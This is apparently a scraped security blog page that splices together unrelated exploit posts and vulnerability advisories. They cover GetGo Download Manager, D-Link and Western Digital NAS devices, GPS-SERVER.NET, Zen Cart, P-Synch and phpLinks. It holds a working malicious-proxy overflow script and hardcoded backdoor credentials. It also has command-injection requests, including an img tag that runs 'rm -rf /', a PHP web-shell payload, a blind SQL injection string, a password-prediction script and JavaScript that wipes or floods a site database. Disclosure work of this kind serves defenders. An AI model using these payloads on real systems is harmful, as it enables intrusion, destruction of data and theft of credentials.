# Exploit Title: Buffer overflow vulnerability in GetGo Download Manager proxy options 5.3.0.2712
# Date: 01-02-2018
# Tested on Windows 8 64 bits
# Exploit Author: devcoinfet
# Contact: https://twitter.com/wabefet
# Software Link: http://www.getgosoft.com/getgodm/
# Category: webapps
# Attack Type: Remote
# Impact: Code Execution
#to be vulnerable victim must have a proxy selected that will maliciously return data in response
#select proxy ip of host running this script incase You have vm running the software
#set port of proxy on getgo under proxy settings as well now when you download any page
#or any file the program incorrectly parses the response and passes request to malicious host triggering overlfow
default_evilbuffer = "A" * 7500
def main():
ip = "10.10.10.6"
port = 8055
fuzz_test(ip,default_evilbuffer,port)
def fuzz_test(ip,payload,port):
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind((ip, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
print "[+] Pushing fuzz test to %s" % addr[0]
buffer = "HTTP/1.1 200 " + payload + "\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending Fuzzed buffer From Mailicious Proxy: OK\n"
print "[+] Payload type Default Buffer of 7500 A's"
sleep(3)
cl.close()
s.close()
if __name__ == '__main__':
import socket
from time import sleep
main()
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863555929
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
DNS-320L ShareCenter Backdoor
Vendor: D-Link
Product: DNS-320L ShareCenter
Version: < 1.06
Website: http://www.dlink.com/uk/en/products/dns-320l-sharecenter-2-bay-cloud-storage-enclosure
###########################################################################
______ ____________ __
/ ____/_ __/ / __/_ __/__ _____/ /_
/ / __/ / / / / /_ / / / _ \/ ___/ __ \
/ /_/ / /_/ / / __/ / / / __/ /__/ / / /
\____/\__,_/_/_/ /_/ \___/\___/_/ /_/
GulfTech Research and Development
###########################################################################
# D-Link DNS-320L ShareCenter Backdoor #
###########################################################################
Released Date: 2018-01-03
Last Modified: 2017-06-14
Company Info: D-Link
Version Info:
Vulnerable
D-Link DNS-320L ShareCenter < 1.06
Possibly various other ShareCenter devices
Not Vulnerable
D-Link DNS-320L ShareCenter >= 1.06
--[ Table of contents
00 - Introduction
00.1 Background
01 - Hard coded backdoor
01.1 - Vulnerable code analysis
01.2 - Remote exploitation
02 - Credit
03 - Proof of concept
04 - Solution
05 - Contact information
--[ 00 - Introduction
The purpose of this article is to detail the research that GulfTech has
recently completed regarding the D-Link DNS 320L ShareCenter.
--[ 00.1 - Background
D-Link Share Center 2-Bay Cloud Storage 2000 (DNS-320L) aims to be a
solution to share, stream, manage and back up all of your digital files by
creating your own personal Cloud.
--[ 01 - Hard coded backdoor
While doing some research on another device, I came across a hard coded
backdoor within one of the CGI binaries. Several different factors such as
similar file structure and naming schemas led me to believe that the code
that was in the other device was also shared with the DNS-320L ShareCenter.
As it turned out our hunch was correct. An advisory regarding the other
vulnerable device in question will be released in the future, as the vendor
for that device is still in the process of addressing the issues.
Now, let's take a moment to focus on the following file which is a standard
Linux ELF executable and pretty easy to go through.
/usr/local/modules/cgi/nas_sharing.cgi
The above file can be accessed by visiting "/cgi-bin/nas_sharing.cgi" and
contains the following function that is used to authenticate the user.
--[ 01.1 - Vulnerable code analysis
Below is the psuedocode created from the disassembly of the binary. I have
renamed the function to "re_BACKDOOR" to visually identify it more easily.
struct passwd *__fastcall re_BACKDOOR(const char *a1, const char *a2)
{
const char *v2; // r5@1
const char *v3; // r4@1
struct passwd *result; // r0@4
FILE *v5; // r6@5
struct passwd *v6; // r5@7
const char *v7; // r0@9
size_t v8; // r0@10
int v9; // [sp+0h] [bp-1090h]@1
char s; // [sp+1000h] [bp-90h]@1
char dest; // [sp+1040h] [bp-50h]@1
v2 = a2;
v3 = a1;
memset(&s, 0, 0x40u);
memset(&dest, 0, 0x40u);
memset(&v9, 0, 0x1000u);
if ( *v2 )
{
v8 = strlen(v2);
_b64_pton(v2, (u_char *)&v9, v8);
if ( dword_2C2E4 )
{
sub_1194C((const char *)&unk_1B1A4, v2);
sub_1194C("pwd decode[%s]\n", &v9);
}
}
if (!strcmp(v3, "mydlinkBRionyg")
&& !strcmp((const char *)&v9, "abc12345cba") )
{
result = (struct passwd *)1;
}
else
{
v5 = (FILE *)fopen64("/etc/shadow", "r");
while ( 1 )
{
result = fgetpwent(v5);
v6 = result;
if ( !result )
break;
if ( !strcmp(result->pw_name, v3) )
{
strcpy(&s, v6->pw_passwd);
fclose(v5);
strcpy(&dest, (const char *)&v9);
v7 = (const char *)sub_1603C(&dest, &s);
return (struct passwd *)(strcmp(v7, &s) == 0);
}
}
}
return result;
}
As you can see in the above code, the login functionality specifically
looks for an admin user named "mydlinkBRionyg" and will accept the password
of "abc12345cba" if found. This is a classic backdoor. Simply login with
the credentials that were just mentioned from the above code.
--[ 01.2 - Remote exploitation
Exploiting this backdoor is fairly trivial, but I wanted a root shell, not
just admin access with the possibility of shell access. So, I started
looking at the functionality of this file and noticed the method referenced
when the "cmd" parameter was set to "15". This particular method happened
to contain a command injection issue. Now I could turn this hard coded
backdoor into a root shell, and gain control of the affected device.
However, our command injection does not play well with spaces, or special
characters such as "$IFS", so I got around this by just playing ping pong
with pipes, and syslog() in order to create a PHP shell. These are the
steps that I took to achieve this.
STEP01: We send a logout request to /cgi-bin/login_mgr.cgi?cmd=logout with
the "name" parameter value set to that of our malicious PHP wrapper code
within our POST data. This "name" parameter is never sanitized.
name=
At this point we have successfully injected our payload into the user logs,
as the name of the user who logouts is written straight to the user logs. A
user does not have to be logged in, in order to logout and inject data.
STEP02: We now use cat to readin the user log file and pipe it out to the
web directory in order to create our PHP web shell.
GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=15&user=mydlinkBRionyg&passwd=YWJjMT
IzNDVjYmE&system=cat/var/www/shell.php HTTP/1.1
At this point an attacker can now simply visit the newly created web shell
and execute any PHP code that they choose, as root.
http://sharecenterhostname/shell.php?01100111=phpinfo();
By sending a request like the one above a remote attacker would cause the
phpinfo() function to be displayed, thus demonstrating successful remote
exploitation as root.
--[ 02 - Credit
James Bercegay
GulfTech Research and Development
--[ 03 - Proof of concept
We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.
--[ 04 - Solution
Upgrade to firmware version 1.06 or later. See the official vendor website
for further details.
--[ 05 - Contact information
Web
https://gulftech.org
Mail
security@gulftech.org
Copyright 2018 GulfTech Research and Development. All rights reserved.
# Exploit Title: GPS-SERVER.NET SAAS CMS <=3.0 Multiple Vulnerabilities
# Exploit Author: Noman Riffat
# Vendor Homepage: http://www.gps-server.net/
# Software Link: http://www.gps-server.net/
# Version: <=3.0
# Tested on: Linux and Windows
# CVE : CVE-2017-17097, CVE-2017-17098
GPS-SERVER.NET SAAS CMS Version <=3.0 Suffers from multiple vulnerabilities
which results in complete takeover of the target remotely.
1. Remote Code Injection (Works until version 3.0)
The writeLog function in fn_common.php in gps-server.net GPS Tracking
Software (self hosted) through 3.0 allows remote attackers to inject
arbitrary PHP code via a crafted request that is mishandled during admin
log viewing. Login, signup and other common incidents are logged into a PHP
file in /logs/ directory with the given input. For example an attacker can
use PHP code in password recovery mode instead of email which will be
injected into the PHP log file.
Demo:
Go to the vulnerable site
Click recover tab
Give following code in email field, fill captcha and click submit
<?php system($_GET[cmd]); ?>
Unfortunately each and every POST request in the CMS is going through
function mysql_real_escape_string() which will add slashes behind every
quote in the payload. So you have to make sure your payload doesn't contain
any quote. Fortunately, PHP is flexible enough to allow a string without
having quotes as you can see in above payload it doesn't contain quotes
around "cmd" but it still works. The shell can then be collected from here
https://localhost/logs/YYYY_MM_user_access.php
YYYY=Current Year
MM=Current Month
Use the payload carefully. If you messed it up, PHP log file will get
corrupted and then wait until next month so CMS generates a new log file
for you :)
Unfortunately the header of log files only allows admin session to access
log data which makes it less of a RCE. Code will only be executed if admin
checks the log files. But fortunately there is another vulnerability
(explained below) which allows an attacker to hijack admin's account hence
making the RCE exploitable with 100% success.
2. Password Reset Vulnerability (Tested upto version 2.7)
gps-server.net GPS Tracking Software (self hosted) 2.x has a password reset
procedure that immediately resets passwords upon an unauthenticated
request, and then sends e-mail with a predictable (date-based) password to
the admin, which makes it easier for remote attackers to obtain access by
predicting this new password. This is related to the use of gmdate()
function for password creation in fn_connect.php.
Demo:
Go to the vulnerable site
Click recover tab
Input admin's email, fill captcha and click submit. Now execute following
PHP code on your local machine immediately.
<?php
for($seconds=-10;$seconds<10;$seconds++){
echo substr(hash('sha1',gmdate('d F Y G i s u',
time()+$seconds)),0,6).'<br>';
}
?>
Submitting password reset form and executing above should be done parallel
to predict password as close as possible. Unfortunately i couldn't make
full remote exploit because of the captcha in the password reset form. This
code will predict possible 20 passwords generated in 20 seconds. It might
not be possible to have synchronized timing on your local machine and
target's server so this code generates 20 passwords (10 before actual time
and 10 after). Set your local machine's time as accurate as you can to get
the perfect combo :)
Password reset vulnerability is tested up to version 2.7 but doesn't work
on version 3.0 which means it was fixed somewhere in between version 2.7
and 3.0 and since the CMS isn't open source so I can't say when it got
fixed (I only had source code of version 2.5.9 and 2.7). Even though the
reset vulnerability was patched unintentionally as developers added a
mid-step in password reset procedure. CMS sends password reset link to the
admin's email and password is only reset once admin clicks the link. Since
we don't know when admin is gonna click the link so we can't predict the
new password.
Mitigation: Update CMS to version 3.1
Give me feedback @nomanriffat :)
WDMyCloud Multiple Vulnerabilities
Vendor: Western Digital
Product: WDMyCloud
Version: <= 2.30.165
Website: https://www.wdc.com/products/network-attached-storage.html
###########################################################################
______ ____________ __
/ ____/_ __/ / __/_ __/__ _____/ /_
/ / __/ / / / / /_ / / / _ \/ ___/ __ \
/ /_/ / /_/ / / __/ / / / __/ /__/ / / /
\____/\__,_/_/_/ /_/ \___/\___/_/ /_/
GulfTech Research and Development
###########################################################################
# WDMyCloud <= 2.30.165 Multiple Vulnerabilities #
###########################################################################
Released Date: 2018-01-04
Last Modified: 2017-06-11
Company Info: Western Digital
Version Info:
Vulnerable
MyCloud <= 2.30.165
MyCloudMirror <= 2.30.165
My Cloud Gen 2
My Cloud PR2100
My Cloud PR4100
My Cloud EX2 Ultra
My Cloud EX2
My Cloud EX4
My Cloud EX2100
My Cloud EX4100
My Cloud DL2100
My Cloud DL4100
Not Vulnerable
MyCloud 04.X Series
--[ Table of contents
00 - Introduction
00.1 Background
01 - Unrestricted file upload
01.1 - Vulnerable code analysis
01.2 - Remote exploitation
02 - Hard coded backdoor
02.1 - Vulnerable code analysis
02.2 - Remote exploitation
03 - Miscellaneous security issues
03.1 - Cross site request forgery
03.2 - Command injection
03.3 - Denial of service
03.4 - Information disclosure
04 - Reused Code
05 - Credit
06 - Proof of concept
07 - Disclosure timeline
08 - Solution
09 - Contact information
10 - References
--[ 00 - Introduction
The purpose of this article is to detail the research that I have completed
regarding the Western Digital MyCloud family of devices.
Several serious security issues were uncovered during my research.
Vulnerabilities such as pre auth remote root code execution, as well as a
hardcoded backdoor admin account which can NOT be changed. The backdoor
also allows for pre auth remote root code execution on the affected device.
The research was conducted on both a WDMyCloud 4TB and a WDMyCloudMirror
16TB with the latest available firmware 2.30.165. My research shows that
the 04 branch of the WDMyCloud firmware is not vulnerable to these issues.
--[ 00.1 - Background
WD My Cloud is a personal cloud storage unit to organize your photos and
videos. It is currently the best selling NAS (network attached storage)
device listed on the amazon.com website, and is used by individuals and
businesses alike. It's purpose is to host your files, and it also has the
ability to sync them with various cloud and web based services.
--[ 01 - Unrestricted file upload
The WDMyCloud device is vulnerable to an unrestricted file upload
vulnerability within the following file:
/usr/local/modules/web/pages/jquery/uploader/multi_uploadify.php
The root of the problem here is due to the misuse and misunderstanding of
the PHP gethostbyaddr() function used within PHP, by the developer of this
particular piece of code. From the PHP manual this functions return values
are defined as the following for gethostbyaddr():
"Returns the host name on success, the unmodified ip_address on failure, or
FALSE on malformed input."
With a brief overview of the problem, let's have a look at the offending
code in order to get a better understanding of what is going on with this
particular vulnerability.
--[ 01.1 - Vulnerable code analysis
Below is the code from the vulnerable "multi_uploadify.php" script. You can
see that I have annoted the code to explain what is happening.
#BUG 01: Here the attacker controlled "Host" header is used to define the
remote auth server. This is by itself really bad, as an attacker could
easily just specify that the host be the IP address of a server that they
are in control of. But, if we send it an invalid "Host" header it will just
simply return FALSE as defined in the PHP manual.
$ip = gethostbyaddr($_SERVER['HTTP_HOST']);
$name = $_REQUEST['name'];
$pwd = $_REQUEST['pwd'];
$redirect_uri = $_REQUEST['redirect_uri'];
//echo $name ."
".$pwd."
".$ip;
#BUG 02: At this point, this request should always fail. The $result
variable should now be set to FALSE.
$result = @stripslashes( @join( @file( "http://".$ip."/mydlink/mydlink.cgi?
cmd=1&name=".$name."=&pwd=".$pwd ),"" ));
#BUG 03: Here an empty haystack is searched, and thus strstr() returns a
value of FALSE.
$result_1 = strstr($result,"0");
$result_1 = substr ($result_1, 0,28);
#BUG 04: The strncmp() call here is a strange one. It looks for a specific
login failure. So, it never accounts for when things go wrong or slightly
unexpected. As a result this "if" statement will always be skipped.
if (strncmp ($result_1,"0",28) == 0 )
//if (strstr($result,"0")== 0 )
{
header("HTTP/1.1 302 Found");
header("Location: ".$redirect_uri."?status=0");
exit();
}
#BUG 05: At this point all checks have been passed, and an attacker can use
this issue to upload any file to the server that they want.
The rest of the source code was omitted for the sake of breivity, but it
just handles the file upload logic once the user passes the authentication
checks.
--[ 01.2 - Remote exploitation
Exploiting this issue to gain a remote shell as root is a rather trivial
process. All an attacker has to do is send a post request that contains a
file to upload using the parameter "Filedata[0]", a location for the file
to be upload to which is specified within the "folder" parameter, and of
course a bogus "Host" header.
I have written a Metasploit module to exploit this issue. The module will
use this vulnerability to upload a PHP webshell to the "/var/www/"
directory. Once uploaded, the webshell can be executed by requesting a URI
pointing to the backdoor, and thus triggering the payload.
--[ 02 - Hard coded backdoor
After finding the previously mentioned file upload vulnerability I decided
to switch gears and start reversing the CGI binaries that were accessable
via the web interface. The CGI binaries are standard Linux ELF executables
and pretty easy to go through. Within an hour of starting I stumbled
across the following file located at:
/usr/local/modules/cgi/nas_sharing.cgi
The above file can be accessed by visiting "/cgi-bin/nas_sharing.cgi" but
it produces server errors with every single method, except when the "cmd"
parameter was set to "7". This piqued my interest and so I really started
digging into the binary, as it seemed very buggy and possibly vulnerable.
As it turns out the error was caused due to buggy code and nothing I was or
wasn't doing wrong. But, while I was figuring out the cause of the error I
happened to come across the following function that is used to authenticate
the remote user.
--[ 02.1 - Vulnerable code analysis
Below is the psuedocode created from the disassembly of the binary. I have
renamed the function to "re_BACKDOOR" to visually identify it more easily.
struct passwd *__fastcall re_BACKDOOR(const char *a1, const char *a2)
{
const char *v2; // r5@1
const char *v3; // r4@1
struct passwd *result; // r0@4
FILE *v5; // r6@5
struct passwd *v6; // r5@7
const char *v7; // r0@9
size_t v8; // r0@10
int v9; // [sp+0h] [bp-1090h]@1
char s; // [sp+1000h] [bp-90h]@1
char dest; // [sp+1040h] [bp-50h]@1
v2 = a2;
v3 = a1;
memset(&s, 0, 0x40u);
memset(&dest, 0, 0x40u);
memset(&v9, 0, 0x1000u);
if ( *v2 )
{
v8 = strlen(v2);
_b64_pton(v2, (u_char *)&v9, v8);
if ( dword_2C2E4 )
{
sub_1194C((const char *)&unk_1B1A4, v2);
sub_1194C("pwd decode[%s]\n", &v9);
}
}
if (!strcmp(v3, "mydlinkBRionyg")
&& !strcmp((const char *)&v9, "abc12345cba") )
{
result = (struct passwd *)1;
}
else
{
v5 = (FILE *)fopen64("/etc/shadow", "r");
while ( 1 )
{
result = fgetpwent(v5);
v6 = result;
if ( !result )
break;
if ( !strcmp(result->pw_name, v3) )
{
strcpy(&s, v6->pw_passwd);
fclose(v5);
strcpy(&dest, (const char *)&v9);
v7 = (const char *)sub_1603C(&dest, &s);
return (struct passwd *)(strcmp(v7, &s) == 0);
}
}
}
return result;
}
As you can see in the above code, the login functionality specifically
looks for an admin user named "mydlinkBRionyg" and will accept the password
of "abc12345cba" if found. This is a classic backdoor. Simply login with
the credentials that I just mentioned from the above code.
Also, it is peculiar that the username is "mydlinkBRionyg", and that the
vulnerability in Section 1 of this paper refers to a non existent file name
of "mydlink.cgi" but, more about that later in section 4...
--[ 02.2 - Remote exploitation
At first, to the untrained eye, exploiting this backdoor to do useful
things may seem problematic due to the fact that only method "7" gives us
no error. And, method 7 only allows us the ability to download any files in
"/mnt/", but no root shell. But, we want a root shell. Right?
After digging deeper I realized that the CGI script was dying every time,
but only at the final rendering phase due to what seems like an error where
the programmer forgot to specify the content type header on output, thus
confusing the webserver and causing the crash. So, everything we do gets
executed up until that point successfully. It is just blind execution.
Now that I had that figured out I started looking for a method I could then
exploit to gain shell access. I started with method "51" because it was the
first one I looked at. This particular method happened to contain a command
injection issue. Now I easily could turn this backdoor into a root
shell, and gain control of the affected device.
GET /cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlinkBRionyg&passwd=YWJjMT
IzNDVjYmE&start=1&count=1;touch+/tmp/gulftech; HTTP/1.1
By sending a request like the one above a remote attacker could now execute
any commands as root. And yes, the password is base64 encoded, as that is
what the script expects. In the example above I simply create a file called
"gulftech" located in the "/tmp/" directory.
The triviality of exploiting this issues makes it very dangerous, and even
wormable. Not only that, but users locked to a LAN are not safe either. An
attacker could literally take over your WDMyCloud by just having you visit
a website where an embedded iframe or img tag make a request to the
vulnerable device using one of the many predictable default hostnames for
the WDMyCloud such as "wdmycloud" and "wdmycloudmirror" etc.
<img src="http://wdmycloud/cgi-bin/nas_sharing.cgi?dbg=1&cmd=51&user=mydlin
kBRionyg&passwd=YWJjMTIzNDVjYmE&start=1&count=1;rm+-rf+/;">
For example simply visiting the above link will totally destroy a WDMyCloud
without the need for any type of authentication whatsoever, and there is
nothing you can do about it except delete the file as the credentials are
hardcoded into the binary itself.
--[ 03 - Miscellaneous vulnerabilities
In addition to the two previously mentioned critical vulnerabilities were
also several other issues. These other issues are still very dangerous, but
require authentication in some cases, and for the most part are not
considered as critical, and also require less technical explanation.
--[ 03.1 - Cross site request forgery
There is no real XSRF protection within the WDMyCloud web interface. This
can have quite the impact on unsuspecting users. Exploitation of this issue
is trivial.
http://wdmycloud/web/dsdk/DsdkProxy.php?;rm -rf /;
For example, if a logged in WDMyCloud admin visits, or is forced to visit
the above link, then the entire device will be wiped out. This is just one
of many XSRF issues. We do not have time to track them all down.
--[ 03.2 - Command injection
Some time ago, a researcher from the "Exploiteers" team found an alarming
number of command injection issues within the WDMyCloud. Unfortunately, we
were able to find quite a few as well.
class RemoteBackupsAPI{
public function getRecoverItems()
{
$xmlPath = "/var/www/xml/rsync_recover_items.xml";
$jobName = $_REQUEST['jobName'];
@unlink($xmlPath);
$cmd = "rsyncmd -l \"$xmlPath\" -r \"$jobName\" >/dev/null";
system($cmd);
if (file_exists($xmlPath))
{
print file_get_contents($xmlPath);
}
else
{
print "";
}
}
}
The above code is an example of the type of command injection issues that
still plague the WDMyCloud. This particular command injection is post auth,
as were all of the other command injections I found too. However, I did not
have time to sift through looking for all of these. And by now I feel
that the manufacturer should know better considering they just went through
the process of patching many command injection vulnerabilities disclosed by
the Exploiteers.[1]
--[ 03.3 - Denial of service
It is possible for an attacker to abuse language preferences functionality
in order to cause a DoS to the web interface. This is due to the fact that
any unauthenticated user can set the global language preferences for the
entire device and all of its users. The psuedocode from the disassembled
binary can be seen below.
int cgi_language()
{
int v1; // [sp+0h] [bp-10h]@1
cgiFormString("f_language", &v1, 8);
xml_set_str((int)"/language", (int)&v1);
xml_write_file("/etc/NAS_CFG/config.xml");
LIB_CP_Config_To_MTD(1);
cgiHeaderContentType("text/html");
return system("language.sh > /dev/null 2>&1 &");
}
This is not a very useful attack vector since we only have 8 bytes to work
with. But, you can make a script that keeps randomly resetting the language
to some random language and it will affect all users of the device and
requires no authentication. It is very hard to use the device if it is
rendering all of the pages in a language you can not understand.
http://wdmycloud/cgi-bin/login_mgr.cgi?cmd=cgi_language&f_language=7
The above example request sets the language to korean. There are 17
available language codes. Details can be found in language.sh located on
the target device.
--[ 03.4 - Information disclosure
It is possible for an attacker to dump a list of all users, including
detailed user information.
GET /api/2.1/rest/users? HTTP/1.1
Making a simple request to the webserver like the one above will dump the
user information to an attacker for all users. This does not require any
authentication in order to take advantage of.
--[ 04 - D-Link DNS-320L ShareCenter
As I have mentioned earlier in this article, I found it peculiar that
the username used for the backdoor is "mydlinkBRionyg", and that the
vulnerability in Section 1 of this paper refers to a non existent file name
of "mydlink.cgi". This really piqued my curiosity, and so I started using
google to try to track down some leads. After searching for the term of
"mydlink.cgi" I came across a reference to a post made by a D-Link user
regarding their D-Link DNS-320L ShareCenter NAS device.[2]
Within that post were references to file names and directory structure that
were fairly unique, and from the D-link device. But, they also perfectly
matched my WDMyCloud device. The more I looked into this the weirder it
seemed. So, I gained access to a D-Link DNS-320L ShareCenter. Once I had it
things became pretty clear to me as the D-Link DNS-320L had the same exact
hard coded backdoor and same exact file upload vulnerability that was
present within the WDMyCloud. So, it seems that the WDMyCloud software
shares a large amount of the D-Link DNS-320L code, backdoor and all. There
are also other undeniable examples such as misspelled function names and
other anomalies that match up within both the WDMyCloud and the D-Link
DNS-320L ShareCenter code.
It should be noted that unlike the WDMyCloud the D-Link DNS-320L is
currently NOT vulnerable to the backdoor and file upload issues, so you
should upgrade your DNS-320L firmware as soon as possible as the issues can
be leveraged to gain a remote root shell on the DNS-320L if you are not up
to date with your device firmware. The backdoor was first removed in the
1.0.6 firmware release. (July 28, 2014)
It is interesting to think about how before D-Link updated their software
two of the most popular NAS device families in the world, sold by two of
the most popular tech companies in the world were both vulnerable at the
same time, to the same backdoor for a while. The time frame in which both
devices were vulnerable at the same time in the wild was roughly from early
2014 to later in 2014 based on comparing firmware release note dates.
--[ 05 - Credit
James Bercegay
GulfTech Research and Development
--[ 06 - Proof of concept
We strive to do our part to contribute to the security community.
Metasploit modules for issues outlined in this paper can be found online.
--[ 07 - Disclosure timeline
2017-06-10
Contacted vendor via web contact form. Assigned case #061117-12088041.
2017-06-12
Support member Gavin referred us to WDC PSIRT. We immediately sent a PGP
encrypted copy of our report to WDC PSIRT.
2017-06-13
Recieved confirmation of report from Samuel Brown.
2017-06-16
A period of 90 days is requested by vendor until full disclosure.
2017-12-15
Zenofex posts disclosure of the upload bug independantly of my research [3]
2018-01-03
Public Disclosure
--[ 08 - Solution
N/A
--[ 09 - Contact information
Web
https://gulftech.org/
Mail
security@gulftech.org
--[ 10 - References
[1] https://blog.exploitee.rs/2017/hacking_wd_mycloud/
[2] http://forums.dlink.com/index.php?topic=65415.0
[3] https://www.exploitee.rs/index.php/Western_Digital_MyCloud
Copyright 2018 GulfTech Research and Development. All rights reserved.
Zen Cart SQL Injection
Vendor: Zen Ventures, LLC
Product: Zen Cart
Version: <= 1.3.8a
Website: http://www.zen-cart.com
BID: 31023
CVE: CVE-2008-6985
OSVDB: 48346
SECUNIA: 31758
PACKETSTORM: 69640
Description:
Zen Cart is a full featured open source ecommerce web application written in php that allows users to build, run and promote their own online store. Unfortunately there are multiple SQL Injection issues in Zen Cart that may allow an attacker to execute arbitrary SQL queries on the underlying database. This may allow for an attacker to gather username and password information, among other things. An updated version of Zen Cart has been released to address these issues and users are encouraged to upgrade as soon as possible.
SQL Injection
There are a couple of SQL Injection issues within Zen Cart that may allow for a malicious attacker to execute arbitrary SQL queries, and gather arbitrary data from the database. The first issue is due to product attribute values not being properly sanitized (particularly the value of certain "id" parameters) when adding to or updating the shopping cart. The queries that are vulnerable to SQL injection can either be an update query, or an insert query depending on current shopping cart state and whether or not the customer is logged in. However, Zen Cart installations running with a database that supports sub selects are vulnerable to exploitation. Otherwise the issue is limited in regards to it's ability to be exploited.
function actionMultipleAddProduct($goto, $parameters) {
global $messageStack;
if (is_array($_POST['products_id']) && sizeof($_POST['products_id']) > 0) {
foreach($_POST['products_id'] as $key=>$val) {
// while ( list( $key, $val ) = each($_POST['products_id']) ) {
if ($val > 0) {
$adjust_max = false;
$prodId = $key;
$qty = $val;
$add_max = zen_get_products_quantity_order_max($prodId);
$cart_qty = $this->in_cart_mixed($prodId);
The above code comes from the actionMultipleAddProduct function in the shopping_cart class, and unlike the first issue I discussed introduces a highly exploitable SQL Injection issue in to Zen Cart. The root of the problem is that the in_cart_mixed function uses $prodId in a query without any sanitation.
products_id[-99' UNION SELECT IF(SUBSTRING(admin_pass,1, 1) = CHAR(97), BENCHMARK
(1000000, MD5(CHAR(1))), null),2 FROM zencart_admin/*]
It's possible for an attacker to submit a request to the "multiple_products_add_product" action with a products_id like the one above (remember to set the value to one if you wish to test this) and successfully enumerate database contents based on query response time. Of course other attacks may be possible also depending on server configuration. For example, if an attacker select INTO OUTFILE then this issue can allow for remote php code execution.
Solution:
The Zen Cart developers were very prompt and professional in releasing a fix for the previously mentioned issues. An updated version, as well as patches can be found at the following location.
http://www.zen-cart.com/forum/showthread.php?p=604473
Credits:
James Bercegay of the GulfTech Security Research Team
P-Synch Multiple Vulnerabilities
Vendor: M-Tech Identity Management Solutions
Product: P-Synch
Version: <= 6.2.5
Website: http://www.psynch.com/
BID: 7740 7745 7747
Description:
P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through: Password Synchronization. Enforcing an enterprise wide password strength policy. Allowing authenticated users to reset their own forgotten passwords and enable their locked out accounts. Streamlining help desk call resolution for password resets. P-Synch is available for both internal use, on the corporate Intranet, as well as for the Internet deployment in B2B and B2C applications.
Path Disclosure Vulnerability:
https://path/to/psynch/nph-psa.exe?lang=
https://path/to/psynch/nph-psf.exe?lang=
Script Injection Vulnerability:
https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc]
https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc]
File Include Vulnerability:
https://path/to/psynch/nph-psf.exe?css=http://somesite/file
https://path/to/psynch/nph-psa.exe?css=http://somesite/file
Solution:
Upgrade to the latest version of P-Synch Password Managment.
Credits:
James Bercegay of the GulfTech Security Research Team.
phpLinks Multiple Vulnerabilities
Vendor: destiney.com
Product: phpLinks
Version: <= 2.1.2
Website: http://phplinks.sourceforge.net/
BID: 6632 6633
Description:
phpLinks is an open source free PHP script. phpLinks allows you to run a very powerful link farm or search engine. phpLinks has multilevel site categorization, infinite threaded search capabilities and more.
Search Script Injection Vulnerability:
phpLinks is prone to HTML injection due to a vulnerability in the search feature. Search queries are not sufficiently sanitized of HTML and script code. These search queries may potentially be displayed to other users when the most popular searches are viewed. If an attacker includes malicious HTML or script code in these queries, it is possible that the attacker-supplied code may be rendered in the web client software of other users.
Add Site Script Injection Vulnerability:
phpLinks does not sufficiently sanitized HTML and script code supplied via form fields before displaying this data to administrative users. This issue exists in the 'add.php' script, which is used to add sites to the phpLinks system. As a result, an attacker may cause malicious HTML and script code to be executed in the web client of an administrative user who reviews attacker-supplied data submitted when a site is added.
Solution:
https://www.securityfocus.com/bid/6632/solution/
https://www.securityfocus.com/bid/6633/solution/
Proof Of Conecpt Exploit:
phpLinks Arbitrary Command Proof Of Concept
Credits:
James Bercegay of the GulfTech Security Research Team.
- https://www.securityfocus.com/bid/6632/info
Put this in one of the field on "Add Site" form located at
http://blah/phplinks/index.php?show=add&PID=
If you inject the code into the Site Title or Site Url field, the code
will be ran as soon as a logged in administrator views it.
<iframe src=http://blah/death.html></iframe>
Below is the code for the called file "death.html"
---------------------------------------------------------------------------
<script language=JavaScript>
var i = 10; // This is the number of the user ID to start deleting
var BaseURL = "http://victimsite/phplinks/";
window.open(BaseURL + '/admin/reset.php?
reset_in=&reset_out=&search_terms=&referrers=&submit='); // this resets
the database
function Waste()
{
while (i) {
i++;
window.open(BaseURL + 'admin/delete_site.php?dbtable=links&ID=' + i
+ '&sure=Yes');
}
}
</script>
<body onLoad="Waste();">
---------------------------------------------------------------------------
As you can see, that code (when called by a logged in admin validating
sites) is run, the database is in alot of cases going to be left empty. By
the way, the dbtable=links can be changed to dbtable=temp in order to
affect sites not yet approved etc. On the other hand you can add users to
the database and more. Take the following code for example:
<iframe src=http://blah/life.html></iframe>
Below is the code for the called file "life.html":
---------------------------------------------------------------------------
<script language=JavaScript>
var i = 1;
var BaseURL = "http://victimsite/phplinks/";
function Gluttony()
{
while (i) {
i++;
window.open(BaseURL + '/admin/add_site.php?SiteName=JeiAr0wnethTheee' + i
+ '&SiteURL=http://www.b' + i + 'j.orfd&Description=' + i
+'3333333333333333333333333333333333&Category=&Country=Turkey.gif&Email=1@t
.' + i + '&UserName=12345' + i
+ '&Password=12345678&Hint=12345678910&add=' + i + '&sure=Yes');
}
}
</script>
<body onLoad="Gluttony();">
---------------------------------------------------------------------------
- https://www.securityfocus.com/bid/6633/info
PHP Topsites Multiple Vulnerabilities
Vendor: iTop 10
Product: PHP Topsites
Version: <= 2.2
Website: http://www.itop10.net/
BID: 6621 6622 6623 6625
Description:
PHP TopSites is a PHP/MySQL-based customizable TopList script. Main features include: Easy configuration config file; MySQL database backend; unlimited categories, Site rating on incoming votes; Special Rating from Webmaster; anti-cheating gateway; Random link; Lost password function; Webmaster Site-approval; Edit site; ProcessingTime display; Cookies Anti-Cheating; Site Reviews; Linux Cron Free; Frame Protection and much more.
Script Injection Vulnerability:
An HTML injection vulnerability has been discovered in PHP TopSites. The issue occurs due to insufficient sanitization of user-supplied data. By injecting HTML code into the <body> tag of the description page, when submitting website, it may be possible to cause an administrator to edit or delete database entries. This issue will occur when an unsuspecting administrator loads the submitted description. This vulnerability also affects the 'edit.php' script.
